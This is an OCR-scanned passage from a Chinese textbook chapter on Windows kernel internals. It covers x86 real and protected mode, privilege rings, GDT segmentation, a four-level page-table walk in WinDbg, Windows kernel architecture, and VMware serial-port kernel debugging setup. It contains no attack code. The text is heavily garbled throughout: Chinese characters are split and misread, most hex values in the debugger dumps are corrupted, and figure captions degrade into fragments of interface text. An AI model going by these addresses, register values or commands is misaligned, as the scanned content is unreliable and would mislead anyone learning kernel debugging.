98/95 并 不 是 真正 的 现代 操作 系统 ， 反 而 可 以 认为 是 MS-DOS 操 作 系统 的 衍生 品 。 为 什么 Windows 
NT 4.0 才 是 现代 Windows 操 作 系 统 的 锥 形 ， 什 么 才 是 真正 的 现代 操作 系统 呢 ? 我 们 先 从 Intel 指 令 
架构 看 起 ， 再 走 入 Windows 操 作 系 统 的 组 织 结构 。 


6.9.1.1 80386 和 保护 模式 


纵 观 Intel 处 理 器 的 历史 ，Intel 80386 是 第 一 款 32 位 处 理 器 ， 在 此 之 前 最 先进 的 处 理 器 也 只 是 16 位 。 
现在 常 说 的 x86 或 者 1386 架 构 就 是 指 的 Intel 80386 所 引入 的 指令 集 。 站 在 操作 系统 的 角度 来 看 ，Intel 
80386 市 来 的 革命 性 变化 就 提供 了 不 同 的 执行 模式 ， 正 是 特权 模型 的 出 现 使 现代 操作 系统 的 实现 成 为 
了 可 能 。 


1. 实 模 式 


实 模 式 是 一 种 模拟 Intel 8086 处 理 器 的 执行 方式 ， 即 Intel 8086 就 是 使 用 这 种 实 模 式 的 形式 执行 的 。 
nN 
80386 后 的 处 理 器 通过 实 模式 来 模拟 老式 处 理 器 的 执行 ， 所 有 的 新 式 Intel 处 理 器 在 局 动 时 都 是 以 


实 模 式 运 行 的 ， 之 后 才 会 切换 到 其 他 执行 模式 。 实 模式 下 只 能 访问 16 位 的 寄存 器 ， 如 AX、BX、SP、 
ERE El 
仔 器 来 进行 协助 ， 如 CS、DS、SS 等 ,通过 16 位 的 段 家 存 器 和 16 位 的 偏 移 值 可 以 寻 址 最 大 为 1 MB 的 
内 存 。MS-DOS 是 一 个 典型 的 实 模式 操作 系统 ，DOS 操 作 系 统 实际 上 没有 多 进程 的 概念 ， 每 次 只 能 有 
一 个 进程 运行 。 后 面 读 者 可 以 看 到 ， 现 代 Windows 操 作 系 统 实现 多 进程 依赖 的 正 是 Intel 处 理 器 的 保 
护 模 式 。 此 外 ，DOS 没 有 内 存 隔离 保护 和 权限 层级 的 概念 。 也 就 是 说 ， 它 并 没有 内 核 代 码 与 用 户 代码 
的 分 别 ， 运行 在 DOS 上 的 代码 可 以 不 受 限制 的 修改 任意 内 存 。 此 非 微 软 所 不 想 也 ， 实 处 理 器 所 不 能 
也 ， 这 正 是 处 理 器 的 执行 模式 所 导致 的 局 限 性 。 


2. 保护 模式 


St A: El: 
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Intel 设 计 了 权限 环 (Ring) 的 概念 。Intel 的 设计 想法 是 共 实 现 4 个 环 ，Ring0 ~ Ring3。 其 中 ，Ring0 
由 操作 系统 内 核 使 用 权限 最 大 ， 可 以 用 来 执行 许多 特权 指令 ; Ring3 权 限 最 小 交 给 用 户 应 用 程序 使 
用 ,执行 受到 许多 限制 ，Ring1 和 Ring2 由 驱动 程序 等 中 间 权 限 的 代码 来 使 用 。 虽然 实际 上 无 论 是 

还 是 类 UNIX 系 统 的 开发 者 都 没有 依照 Intel 的 设计 ， 它 们 最 后 都 只 使 用 了 Ring0 和 Ring3， 其 中 
Ring0 用 于 执行 操作 系统 内 核 、 第 三 方 驱 动 程序 等 ，Ring3 用 于 执行 用 户 的 代码 。 但 是 这 种 权限 隔离 
的 思想 无 疑 得 到 了 应 用 。 一 些 敏感 的 宵 存 器 操作 指令 ， 如 针对 全 局 描述 符 表 寄存 器 操作 的 lgd 引 有 令 、 
针对 中 断 描述 符 表 操作 的 lidt、 针 对 型 号 特定 寄存 器 (MSR) 操作 的 wrmsr， 以 及 直接 IO 操作 指令 

、out 等 ， 都 成 为 只 有 在 Ring0 下 才能 执行 的 特权 指令 。 此 外 ，Intel 把 内 存 与 权限 环 挂 上 了 钩 ，Ring 

0 的 指令 可 以 访问 Ring0 和 Ring3 的 内 存 ， 而 Ring3 的 指令 只 能 访问 Ring3 的 内 存 ， 而 访问 Ring0 的 内 存 
会 触 友 通 用 保护 (General Protect) 异常 。 在 进一步 了 解 这 种 保护 是 如 何 实现 的 之 前 ,我 们 需要 先 了 
解 现代 操作 系统 是 如 何 通过 保护 模式 处 理 器 进行 内 存 寻 址 的 。 


6.9.1.2 Windows 操 作 系 统 寻 址 


现代 操作 系统 内 存 寻 址 是 通过 内 存 分 段 和 内 存 分 页 两 部 分 来 实现 的 ， 其 中 分 段 机 制 是 实 模式 遗留 下 来 
的 产物 ， 分 页 机 制 则 是 新 引入 的 机 制 。 因 此 实际 上 分 段 机 制 并 没有 发 挥 什么 作用 ，Windows 内 核 通 过 
一 种 称 为 平坦 寻 址 的 方式 把 分 段 机 制 给 “架空 ” 了。 平坦 寻 址 是 指 把 段 表 (全 局 描述 符 表 ) 中 的 各 项 
( 段 选择 子 ) 都 指向 同一 片 内 存 区 域 ， 因 而 我 们 访问 CS 或 DS、SS 段 寄存 器 也 就 没有 任何 区 别 了 (也 
存在 一 些 例外 的 段 寄 存 器 ， 如 FS 或 GS 在 用 户 态 始 终 指向 线程 环境 块 TEB， 在 内 核 态 始终 指向 处 理 器 控 
制 区 KPCR) 。 当 然 ， 为 了 理解 这 个 过 程 ， 需 要 先 清楚 分 段 寻 址 的 过 程 。 


首先 ， 操 作 系 统 内 核 通 过 段 表 来 保存 分 段 的 信息 ， 因 为 运行 在 保护 模式 下 的 现代 操作 系统 是 一 个 多 进 


程 并 行 的 系统 ， 所 以 每 个 进程 都 拥有 各 目的 段 表 ， 即 全 局 ( 段 ) 描述 符 表 (Global to bl 


a 
，GDT) 。 那 么 ， 当 一 个 进程 进行 寻 址 时 该 如 何 找 到 GDT 的 位 置 呢 ? Intel 设 计 了 GDTR 寄 仓 器 ， 专 
门 保存 本 进程 的 GDT 基 地 址 ， 当 进程 上 下 文 发 生 切 换 时 ，GDTR 也 会 随 之 变化 ， 始 终 对 应 当前 进程 的 
GDT 基 地 址 ， 并 且 针 对 GDT 操 作 的 指令 也 是 特权 指令 ， 只 能 在 Ring0 下 执行 。 


图 6-9-1 是 Intel 官 方 文档 中 GDT 结 构 的 描述 图 ， 除 了 GDT 还 有 LDT， 但 它 并 不 是 我 们 关注 的 重点 。 目 
标 内 存 地 址 的 虚拟 地 址 实际 上 分 为 两 部 分 ， 一 部 分 保存 在 段 寄存 器 中 称 为 段 选择 子 ， 另 一 部 分 是 我 们 
实际 想 访问 的 地 址 ， 它 实际 上 是 偏 移 值 ， 见 图 6-9-2。 


我 们 尝试 通过 Windbg 观 察 这 个 过 程 。 先 使 用 Windbg 建 立 双 机 调试 会 话 (后 面 会 介绍 如 何 建 立 双 机 
调试 ) ， 表 执行 .process 命 令 ， 查 看 目前 所 处 的 进程 上 下 文 ， 该 命令 会 返回 当前 进程 的 EPROCESS 地 
址 ， 通 过 ! process 指 定 EPROCESS 地 址 来 查看 进程 的 信息 。 在 图 6-9-3 中 ， 进 程 正 位 于 system 进 程 
上 下 文 NT 模块 的 一 个 断 点 中 。 然 后 通过 r 命 令 来 查看 GDTR 寄 存 器 和 C3 寄 存 器 的 内 容 。 


Global Local 
Descriptor Descriptor 
Table (GDT) Table (LDT) 


n=1 


GDTR Register LDTR Register 
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Base Address Base Address 
本 
图 6-9-1 (来 自 Intel 文 档 ) 


rcx, rax 
r8, [rbp+11F6h+var B68] 
rax, cs:off 14002B668 
edx，68h 





rax= 000000000000bce1 rbx=fffff86147bef186 rcx=060060000600060061 

rdx=0000211d00000666 rsli=0600006060000691 Sanh i 

rip=fffff88149247cde rsp=fffff86148e34b48 

r8=906000666006060148 r9=ffff9986b3a53f888 i 00000000000000a3 

rl1=fffff89148e34C28 Fl12=090000000099003d45 r13=8660000000000000 

rlA=8000000000000000 rl1i5=8000000000600860]14 

lopl=08 nv up el pl nz na pe nc 

cs5=8010 55s=8018 ds=882b es=882b fs=8853 gs=882b efl=88886282 

ntlDbgBreakPointWithstatus: 

fffff861 49247cde cc int 3 

8@: kd> .process 

Implicit process is now ffff998b 3a4c8440 

8@: kd> lprocess ffff999b 3a4c8440 9 

PROCESS ffff999b3a4c9449 
SesslonId: none Cid: 90064 Peb: 969996669696 ParentCid: 6688 
DirBase: 661aa662 ObjectTable: ffffd5ebf3814646 HandleCount: 2141. 
Image: System 








图 6-9-3 
由 图 6-9-4 可 以 看 到 ，0x10 号 全 局 描述 符 项 是 一 个 基地 址 为 0， 上 限 为 0 的 段 。 上 限 为 0 表示 无 上 限 ， 
因此 得 到 了 虚拟 地 址 0xfffff80149247cd0 的 线性 地 址 也 为 0xfffff80149247cd0。 也 就 是 说 ， 虚 拟 地 
址 与 经 过 分 段 处 理 后 的 线性 地 址 是 一 样 的 ， 这 印证 了 前 文 所 说 的 平坦 寻 址 模式 ， 分 段 机 制 只 是 走 了 一 


个 形式 ， 实 际 上 被 “架空 ”了 。 虽然 分 段 机 制 与 全 局 描述 符 表 在 Windows 上 作用 不 大 ， 但 是 其 中 依然 
实现 了 Intel 基 于 权限 环 隔离 的 思想 。 


图 6-9-5 是 全 局 摘 述 符 表 项 的 结构 ， 其 中 第 13、14 位 被 称 为 DPL， 用 于 标识 一 个 段 的 访问 权限 。 


69: kd> r gdtr 
gdtr=fffff86323344fbe 
: kd> dg 6x16 
P Si Gr Pr Lo 
1 ze an es ng Flags 


64 位 段 描述 符 
24 23 22, .21 20 1 奈 :13 铸 ， 拘 -21 划 


段 界限 (20 位 ) 段 大 小 (如 果 G=0:; 1 字 节 -1IMB， 如 果 G=]，4KB 到 4GB) 
基地 址 (32 位 ) 用 于 形成 最 终 线性 地 址 的 起 始 线性 地 址 
段 类 型 (代码 或 数据 ) 、 访 问 和 增长 方向 
如 果 S 清 零 ， 为 系统 段 ， 如 果 S 置 位 ， 为 应 用 程序 段 
描述 符 特权 级 (00= 环 -0，11= 环 -3) 
如 果 P 置 位 ， 段 驻 留 在 内 存 中 
无 明确 目的 ， 方 便 操 作 系 统 使 用 
IA-32 处 理 器 把 该 位 设置 为 0 (表明 64 位 代码 ) 
根据 段 类 型 (代码 、 数 据 或 栈 ) 不 同 而 有 特定 含义 
查看 段 界限 域 描述 


图 6-9-5 (图 片 来 自 《Rootkit: 系统 灰色 地 带 的 潜伏 者 》 ) 
如 果 内 存 访问 时 违反 了 这 种 规定 ， 就 会 触发 中 断 描述 表 IDT 中 的 0 号 异常 一 一 通用 保护 异常 ， 即 内 存 访 


oli 在 全 
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获得 线性 地 址 后 ， 接 下 来 的 问题 是 如 何 得 到 线性 地 址 对 应 的 物理 地 址 ， 物 理 地 址 才 是 内 存 的 真正 位 
置 。 毫 无 疑问 ， 这 是 通过 分 页 机 制 实现 的 。 


分 页 机 制 一 般 通 过 两 层 结构 来 实现 : 页 目录 表 (Page Directory) 和 页 表 (Page Table) ， 其 中 的 项 
分 别称 为 页 目录 项 PDE (Page Directory Entry) 和 页 表 项 PTE (Page Table Entry) 。 与 Windows 
的 句柄 表 结 构 类 似 ， 分 页 机 制 通过 两 层 稀 足 表 来 节约 内 人 存 空 间 。 页 目录 项 保存 的 是 页 表 的 基地 址 ， 而 
页 表 项 中 保存 的 是 实际 的 物理 内 存 页 的 物理 基地 址 。 我 们 之 前 换算 的 线性 地 址 也 是 作为 一 个 “选择 
子 ” 来 使 用 。 那 么 问题 是 如 何 获 得 页 目录 的 基地 址 呢 ” 实际 上 与 全 局 描述 符 表 相似 ， 页 目录 基地 址 也 
是 通过 一 个 寄存 器 来 保存 的 ， 不 过 它 没有 专门 的 寄存 器 而 是 保存 在 CR3 寄 存 器 中 ， 因 此 CR3 也 得 名 为 
页 目录 基 址 寄存 器 PDBR， 见 图 6-9-6。 


31(63) 12 11 5432 


P 
CR3 
W 


图 6-9-6 (图 片 来 自 Intel 文 档 ) 
Intel 处 理 器 支持 三 种 分 页 结构 ,分 别 是 32 位 分 页 结构 、PAE 结 构 和 4-level 结 构 。32 位 分 页 结构 是 32 
位 处 理 器 时 代 的 使 用 的 分 页 模式 。 最 大 只 支持 4 GB 的 物理 内 存 ， 这 是 这 种 分 页 方式 的 局 限 。PAE 同 样 
是 32 位 处 理 器 使 用 的 分 页 结构 ， 其 设计 初衷 是 让 运行 其 上 的 操作 系统 能 够 支持 更 大 的 物理 内 存 ， 其 把 
页 目录 PD 和 页 表 PT 的 两 层 结构 变 为 了 页 目录 指针 表 PDP、 页 目录 PD 和 页 表 PT 的 三 层 结构 ， 从 而 实现 
了 把 32 位 线性 地 址 映 丑 为 52 位 的 物理 地 址 ， 拓 展 了 32 位 处 理 器 的 寻 址 能 力 。4-level 分 页 结构 正如 其 
名 ， 在 PAE 基 础 上 增加 了 PML4， 把 48 位 的 线性 地 址 映射 为 52 位 的 物理 地 址 。 


下 面 使 用 4-level 的 64 位 处 理 器 的 64 位 Windows 10 操 作 系统 ， 寻 址 过 程 见 图 6-9-7。 首 先 ， 我 们 通过 
CR3 寄 存 器 获得 PML4 表 的 基地 址 ， 通 过 “r cr3” 读 取 CR3 寄 存 器 的 值 。 


CR3 寄 仔 器 的 值 为 0x1aa002 ( 见 图 6-9-8) ， 也 存在 标志 位 域 、 保 留 域 ， 其 结构 见 图 6-9-9。 


Linear Address 
30 29 21 20 


Directory PDE with PS=0 
ES 


Pp 
Pointer Table 40 
Page-Directory 


图 6-9-7 (图 片 来 自 Intel 文 档 ) 


rax=06060606066606669bc61 rbx=fffff86147bef188 rcx=808600000000806080801 
rdx=06006211d66666666 rsi=60666666666666661 rdi=fffff861494ff466 
rip=fffff860149247cd6 rsp=fffff860148e34b48 rbp=6666666666666669 
r8= 148 “r9=ffff996b3a53f666 Fr16=066666686666666a3 
r11=fffff86148e34C28 F12=060666660666663d45 F13=66660666666666666 
= F15=000066060666666614 
nv up ei pl nz na pe nc 
S=0618 ds=6602b es=6862b fs=6653 gs=8862b 
nt1!DbgBreakPointWithstatus:; 
fffff861 49247cd6 cc int 3 
9: kd> r cr3 
cr3=06066666661aa662 


; indirectly determines the memory type used to access the PML4 table during linear- 
address translation (see Section 4.9.2) 
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Page-level cache disable; indirectly determines the memory type used to access the PML4 table during linear-address 


translation (see Section 4.9.2) 
lgnored 


MD | Physical address of the 4-KByte aligned PML4 table used for linear-address translation! 
63M | Reserved (must be 0) 


图 6-9-9 (图 片 来 自 Intel 文 档 ) 


根据 规则 ， 我 们 取 CR3 的 12 位 以 上 的 域 ， 因 此 PML4 的 基地 址 是 0x1aa000， 线 性 地 址 的 第 39 ~ 47 位 
表示 PML4E 的 序号 ， 即 第 0x1f0 项 ， 见 图 6-9-10。 因 为 CR3 寄 存 器 指示 的 PML4 内 和 存 地 址 实 为 物理 内 
存 地 址 ， 所 以 需要 通过 Windbg 拓 展 指令 ! dq 进行 观察 。 


80: kd> .formats OxFFFFF88149247CD@ 
Evaluate expression: 
Hex: fffff861 49247cd98 
Decimal: -8798576926896 
Octal: 17777776608680511118763298 
Binary: 11111111 11111111 111118886 6868606686961 8916616861 096166166 91111188 11916669 
Chars: ....I4$|. 
Time: <* 相 本 本 本 Invalid FILETIME 
Float: low 673741 high -1.#QNAN 
Double: -1.#QNAN 
8: kd> .formats 9y1l11110066 
Evaluate expression: 
Hex: 
Decimal: 
Octal: 
Binary: 
chars: a 
Time: Thu Jan 1 08:68:16 1976 
Float: low 6.95944e-643 high 8 
Double: 2.45857e-321 


图 6-9-10 
PML4E ( 即 0x1f0 项 ) 的 值 为 0x4a08063 ( 见 图 6-9-11) ， 同 样 具 有 自己 的 结构 类 型 ， 见 图 6-9-12。 
其 中 ， 低 于 12 位 的 值 作为 标志 位 人 存 任 ， 依 据 该 规则 得 出 PDPT 的 基地 址 为 0x4a08000 (物理 地 址 ) 。 
同时 ， 线 性 地 址 的 第 30~ 38 位 指示 了 PDPTE 的 序号 ， 得 出 PDPTE 的 序号 为 9 ( 见 图 6-9-13) ， 从 而 得 
到 了 PDPTE 的 值 为 0x4a09063， 见 图 6-9-14。 


kd> !dq 6x1aa000+0Xx1f6”<8 
1aaf86 060060666 604a08663 
1aaf96 66666666 896666669 
1aafa6 666666668 896666666 
1aafb6 66666666 86666669 
1aafce 0686666668 66666666 
1aafd6 66666666 8686666666 
1aafe6 066666666 8686666666 
1aaff6 666666696 96966666869 


厢 亲 站 冲冲 站 站 亲 曲 


图 6-9-11 


ml 
CI ES 


图 6-9-12 (图 片 来 自 Intel 文 档 ) 


9: kd> .formats Q@xFFFFF88149247CD@ 
Evaluate expression: 
fffff801 49247cd9 
: -8796576926896 
1777777666651111676326 
: 11111111 11111111 11111066 060666661 91661661 66166166 91111166 11916666 
I$| . 
Invalid FILETIME 
low 673741 high -1.#QNAN 
:2 -1。 
9: kd> .formats 9y6866666161 
valuate expression: 
Hex: 86666666 -866666665 


Thu Jan 1 98:00:95 19796 
low 7.96649e-645 high qd 
: 2.47633e-323 


: kd> !dq 8x4a68066+5*8 

4a08028 068666666 04a609663 9668666666 6686666696 
4a08038 

4a08048 

4a08058 

4a08068 

4a08078 

4a08088 
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此 4a68698_ 968668666 8068866868 98868866 696688669| 


图 6-9-14 
PDPTE 除 了 指示 有 PD 的 基地 址 外 也 包含 一 些 标 志 位 ， 它 的 结构 见 图 6-9-15， POR 
。 线 性 地 址 的 第 21 ~ 29 位 指示 了 PDE 的 序号 ， 计 算出 该 值 为 0x49。 


OO 


Address of PML4 table 


古 品 本 二 二 二 上 
0 


Bd: 
1. 


图 6-9-15 (图 片 来 自 Intel 文 档 ) 
同样 ， 通 过 ! dq 命令 访问 物理 内 存 ， 得 到 0x49 号 PDE 的 值 为 0x4a17063， 见 图 6-9-16。 


列 受 
可 


90: kd> ldq 96x4a69060+6X49*8 


图 6-9-16 
PDE 的 结构 见 图 6-9-17 所 示 ， 同 样 低 12 位 为 标志 位 及 保留 位 。 因 此 ， 计 算出 PT 的 基地 址 为 0x4a Ss 
(物理 地 址 ) 。 线 性 地 址 的 第 12 ~ 20 位 为 PTE 的 序号 ， 计 算出 序号 为 0x47。 通过 ! dgq 读 取 物 理 内 
仔 ， 查 看 0x47 号 PTE 的 内 容 ， 见 图 6-9-18， 访 值 为 0x90000000323d021。 


根据 PTE 的 结构 得 出 物理 页 帧 的 地 址 为 0x323d000。 线 性 地 址 的 第 0 ~ 11 位 ( 即 低 12 位 ) 表示 在 4 KB 
物理 内 存 页 中 的 偏 移 值 ， 该 值 为 0xcd0。 因 此 ， 线 性 地 址 0xFFFFF80149247CD0 对 应 的 物理 内 存 地 址 
为 0x323dcd0， 见 图 6-9-20。 


为 了 验证 ， 我 们 分 别 使 用 dq 命令 访问 虚拟 内 存 、! dq 命令 访问 物理 内 存 ， 对 比 内 存 的 数据 结果 

图 6-9-21。 可 以 友 现 ， 数 据 完全 一 怪 。 这 襄 明了 虚拟 地 址 90xFFFFF80149247CD0 指 同 的 是 物理 内 存 
地 址 0x323dcd0。 在 了 解 了 内 存 分 页 处 理 的 过 程 后 ， 再 来 看 权限 环 思想 是 如 何在 内 存 分 页 中 得 以 体 
现 的 。 在 PML4、PDPT、PD、PT 等 表 项 中 均 存在 U/S 位 。U/S 位 用 于 描述 表 项 所 表示 的 内 存 空间 的 访 
问 权限 ， 若 U/S 为 0， 则 权限 环 为 3 的 代码 就 无 法 访问 这 块 内 存 空间 。 因 此 ，Windows 通 过 该 机 制 将 内 
仔 分 为 用 户 空 间 、 内 核 空间 两 部 分 


WE 


Address of PML4 table 


X 


一 一 一 
I 


D| Prot 
s 
0 


|_ Ww 24 


~ 


|_wO) 
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kd> !1dq 98x4a170660+0X47*8 
4a17238 69066666 60323d621 
4a17248 0609066666 69323f621 
4a17258 096066666 63241621 
4a17268 096066666 603243621 
4a17278 69066666 0693245621 
4a17288 0696066666 63247821 
4a17298 69666666 03249821 
4a172a8 0960666668_ 9324b621 


冲冲 冲冲 冲冲 冲 亲 全 


G9 eS 
slo | | laloleelsslel 34 


Ignored 


Reserved? 6 
OT 
| 
or 


Address of PML4 table 


图 6-9-19 (图 片 来 自 Intel 文 档 ) 


9: kd> .formats 9xFFFFF80149247CD6 

Evaluate expression: 
Hex: fffff861 49247cdo6 
Decimal: -87985786926896 
Octal: 1777777606651111076320 
Binary: 11111111 11111111 11111066 660666661 091061661 66166166 91111166 11616669 
charse eeslgls 
Time: **K* 术 六 Invalid FILETIME 
Float: low 673741 high -1.#QNAN 
Double: -1.#QNAN 

0: kd> .formats 9y11661101606696 

Evaluate expression: 
Hex: 
Decimal: 
Octal: 
Binary: 
Chars: 
Time: 
Float: 
Double: 


Thu Jan 1 98:54:46 1976 
low 4.59626e-842 high 9 
1.62054e-3290 


图 6-9-20 


9: kd> ldq 9x323d660+6xcdg9 

# 323dcd6 ccCCCCCC CCCCC3CC 
323dce6 8b66c28b 44c88b45 
323dcf6 ccccc3cc 2dcd6669 
323dd66 428b4c82 4a8b4466 
323dd16 cc2dcd88 69066062b8 
323dd26 ccc3cc2d cdco8b41 
323dd38 6666CcCCC CCCCCCCC 

# 323dd46 ccc3f624 98418b48 

: kd> dq @xFFFFF88149247CD@ 


6806000660060 60841fef 
9001b868 498b4811 
864601fef cccccccc 
8688498b48 118b6668 
96cCCCCC CCCCCCC3 
CCCEGCEC CCCCCECC 
8606060660600 60841fef 
661fefcc cccccccc 


fffff861 49247cd6 
fffff861 49247Cceg 
fffff861 49247cf@ 
fffff801 49247d66 
fffff8601 49247d196 
fffff861 49247d26 
fffff8601 49247d308 
fffff861 49247d46 


CCCCCCCC CCCCC3CC 
8b66c28b 44c88b45 
CCCCC3CC 2dcd6669 
428b4c82 4a8b4466 
cc2dcd66 68686866862b8 
CCC3cc2d cdce8b41 
6666CCCC CCCCCCCC 
ccCc3f024 98418b48 


图 6-9-21 


三 三 -em 


006606668 680841fef 
00601b868 498b4811 
90906461f6f cccccccc 
098498b48 118b6688 
QOCCCCCC CCCCCCC3 
CCECCCCCC CCCCCCCE 
6660060000 96841f9f 
8061fefcc CCCCCCCC 


下 em 
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图 6-9-22 


6.9.1.3 Windows 操 作 系 统 架 构 


通过 内 存 的 分 段 与 分 页 机 制 ，Windows 系 统 将 内 存 划 分 为 用 尸 空间 和 系统 空间 。 每 个 进程 都 有 目 己 独 
立 的 虚拟 内 存 空间 ， 每 个 进程 的 虚拟 内 存 空间 是 独立 且 相 等 的 ， 进 程 的 虚拟 内 存 空间 的 总 和 可 以 远大 
于 物理 内 存 空间 。 只 有 当 进 程 的 虚拟 内 存 被 访问 时 ， 对 应 的 虚拟 地 址 空间 才 会 被 映射 到 实际 的 物理 内 
仓 ， 该 操作 是 通过 缺 页 中 断 实现 的 。 一 个 进程 内 的 虚拟 内 存 空间 也 被 分 为 用 尸 空间 和 内 核 空间 两 部 
分 。 每 个 进程 的 用 尸 空间 被 映射 到 独立 的 物理 内 存 区 域 ， 但 是 内 核 空间 是 全 部 进程 共享 的 ， 换 言 之 ， 
每 个 进程 的 内 核 空 间 都 被 映射 到 同一 块 物理 内 存 区 域 。 


当然 存在 一 些 例外 ， 如 System 进 程 只 有 具有 内 核 空间 ， 是 所 有 内 核 线程 的 容器 。 图 6-9-23 是 Windows 

操作 系统 的 整体 纺 构 ， 运 行 在 用 户 空间 的 包含 用 户 进程 、 子 系统 、 系 统 服务 和 系统 进程 。 当 然 ， 其 划 

分 存在 重 二 ， 但 是 最 终 用 户 态 代码 进入 内 核 态 需 要 依赖 ntdll.dll。ntdll.dll 提 供 了 一 系列 系统 调用 ， 用 

于 供用 户 态 程序 使 用 系统 内 核 的 功能 。 这 些 调用 被 称 为 Native APl。 Native a 

操作 系统 相似 ， 都 是 通过 中 断 或 快速 系统 调用 (sysenter) 切换 到 内 核 态 ， 后 续 调 用 通过 system 
Dispatcher Table (SSDT) 进行 分 发 。 


Service 


Applications Environment 
Subsystems 


System Service Dispatcher 
(Kernel mode callable interfaces) 


ee | 
renong 用 

,| #8 sR 
| 六 | z8 | a a| 


Hardware Abstraction Layer (HAL) 


Hardware interfaces (buses, IO devices, interrupts, 
interval timers, DMA, memory cache control etc) 


图 6-9-23 (图 片 来 目 MSDN 文 档 ) 
Windows 内 核 由 内 核 执行 体 和 内 核 核 心 两 部 分 组 成 ， 这 是 由 微软 给 出 的 定义 。 由 核 执 行 体 是 担 ww 。 
内 核 中 较为 上 层 的 部 分 ， 包 含 |//O 管 理 器 、 进 程 管理 器 、 内 存 管理 器 等 ， 但 实际 上 这 些 “ 管 理 器 " 
只 是 NT 模块 中 的 一 系列 销 数 。 内 核 核心 则 由 NT 模块 中 一 些 更 底层 的 支持 消 数 组 成 。 与 类 UNIX 操 作 系 


统 内 核 不 同 ，Windows 操 作 系 统 的 图 像 部 分 也 是 在 内 核 空间 实现 的 ，Windows 为 此 提供 了 Shadow 
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SSDT 专 门 用 于 分 发 图 像 方面 的 调用 ， 这 些 调用 独立 于 NT 模块 ， 存 于 win32k.sys、dxgkrnl.sys 等 模块 
中 。 


内 核 空间 中 另 一 个 重要 的 组 成 部 分 是 驱动 程序 。 对 于 Windows 操 作 系 统 来 说 ， 内 核 驱 动 程序 完全 可 以 
不 驱动 任何 硬件 ， 只 是 意味 着 代码 运行 于 内 核 态 。 内 核 驱动 程序 包括 第 三 方 驱动 和 系统 自 有 的 驱动 程 
序 ，Windows 内 核 执 行 体 中 的 |/O 管 理 器 负责 与 内 核 驱 动 程序 进行 交互 。 内 核 驱 动 程序 的 交互 设计 与 
Windows 用 户 态 GUI 的 消息 机 制 相似 ， 其 提供 了 一 种 称 为 IRP 的 消息 包 ， 内 核 驱 动 程序 通过 设备 对 象 
组 成 堆 芭 依次 处 理 IRP 消 息 包 并 与 内 核 执行 体 的 I/O 管 理 器 进行 交互 反馈 信息 。 用 户 态 应 用 程序 想 访 问 
内 核 驱 动 程序 并 进行 数据 传递 时 ， 需 要 先 调用 用 户 态 相 天 的 Native API， 这 些 Native API 会 调用 到 内 
核 执 行 体 l/O 管 理 器 中 相应 的 立 数 ， 这 些 肖 数 负责 将 用 户 仿 的 请 求 进 行 处 理 并 生成 IRP 包 后 传递 给 对 应 
内 核 驱动 程序 。 


Windows 内 核 的 底层 是 HAL 硬 件 抽象 层 ， 这 里 存在 针对 很 多 不 同 硬件 平台 的 相同 功能 的 代码 ， 目 的 是 
将 硬件 磊 异 与 上 层 实 现 隔离 ， 使 得 上 层 可 以 使 用 统一 的 接口 。 


6.9.1.4 Windows 内 核 调试 环境 


下 面 介绍 如 何 搭建 内 核 调试 环境 。 内 核 调试 方法 目前 有 两 种 ,一 是 以 softice 为 代表 的 本 机 内 核 调试 
二 是 以 Windbg 为 代表 的 双 机 内 核 调试 。 以 softice 为 代表 的 本 机 内 核 调 试 出 现 得 早 ， 曾 经 的 内 核 调试 
都 是 通过 icesoft 完 成 的 。 而 随 着 softice 的 不 再 更 新 ，Windbg 双 机 调试 成 为 了 WDK (Windows a 

Kit) 的 官方 调试 手段 。 更 重要 的 是 ， 本 机 内 核 调 试 具有 种 种 限制 ， 所 以 现在 对 Windows 内 核 的 调 
斌 一般 通过 Windbg 双 机 调试 来 完成 。 


配置 Windbg 双 机 调试 需要 分 别 配置 主机 和 客 尸 端 两 部 分 ，Windbg 文 持 串 口 、 火 线 、USB 等 连接 方 


式 ， 客 尸 端 也 可 以 选用 虚拟 机 或 者 真实 的 物理 机 两 种 。 


这 里 以 VMware 虚拟 机 串口 的 方式 进行 演示 。 首 先 ， 设 置 虚 拟 机 的 启动 配置 。Windows 7 之 前 版 本 ， 
局 动 配置 通过 boot.ini 来 设置 。 自 Windows 7 开始 ， 启 动 配置 由 bcdedit 命 令 来 管理 。 这 里 的 客户 六 
虚拟 机 版 本 为 Windows 10， 吕 然 也 可 以 通过 bcdedit 命 令 来 设置 调试 启动 ， 但 是 更 简便 的 方法 是 通 


ueleR 


通过 Win+R 组 合 键 打 开 “ 运 行 ” 对 话 框 ,输入 “msconfig”， 出 现 图 6-9-24 所 示 的 对 话 框 ， 选 择 
“Boot ”选项 卡 ， 选 择 想 设置 为 调试 局 动 的 局 动 项 目 并 单 击 “Adanced Options ” 。 
在 出 现 的 对 话 框 ( 见 图 6-9-25) 中 勾 选 “Debug” 复 选 枉 ， 在 “Global debug settings” 的 5 
| ” Debug 
port” 下 拉 列 表 中 选择 “COM1” (串口 1) ， 在 “Baud rate” 下拉 列表 中 选择 波 特 率 为 本 
”。 至 此 ， 客 户 端 设置 完毕 ， 下 一 步 是 设置 VMware 虚拟 机 以 增加 一 个 串口 。 


打开 虚拟 机 设置 ， 单 击 “Add” 按钮 ， 以 增加 新 硬件 ， 在 出 现 的 对 话 框 ( 见 图 6-9-26) 中 选择 
eria 
Port” ( 串 行 端口 ) ， 然 后 单 击 “Finish” 按钮 。 


我 们 的 操作 新 建 了 一 个 名 为 Serial Port 2 的 串口 ( 见 图 6-9-27) ， 这 是 因为 VMware 上 自 带 的 虚拟 打印 
机 占用 了 1 号 串口 。 选 择 “Printer” ， 单 击 “Remove” 按钮 ， 移 除 虚 拟 打 印 机 。 再 重复 上 述 操作 ， 
成 功 地 创建 了 1 号 串口 。 
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EO ON WSIwS WIIVSI TI TI VS 


全， Diagnostic startup 
Load basic devices and services only 


图 Selective startup 
Load system services 
Load startup items 


[] use original boot configuration 


6 


General Boot | [Number of processors: 


"oadC - _ (d 1 
Windows 10 (0 


LPCI Lock 
[jpebug 


Global debug settings 


Debug port: 


USB 


Boot options 
[Safe boo 
Minim 


Altern 


Channel: 


Active USB target name: 


Netw( wtf 


Hardware Options 


Device 

EIMemory 

荡 计 Processors 
Hard Disk (scSD 
© CD/DVD (SATA) 
fo Network Adapter 
(二 US8 Controller 
dy Sound Card 

(a Printer 
[Joisplay 


Hardware Options 


Device 
多 Memory 

| | Processors 
Hard Disk (SCSI) 
(®) CD/DVD (SATA) 
Foy Network Adapter 
加 USB Controller 
路 Sound Card 
(a Printer 
Serial Port 2 
[loisplay 


Hardware Type 


图 6-9-24 


中 Maximum memory: 
0 


Baud rate: 


ot settings 


图 6-9-25 


3D graphics 
Accelerate 3D graphics 


Monitors 


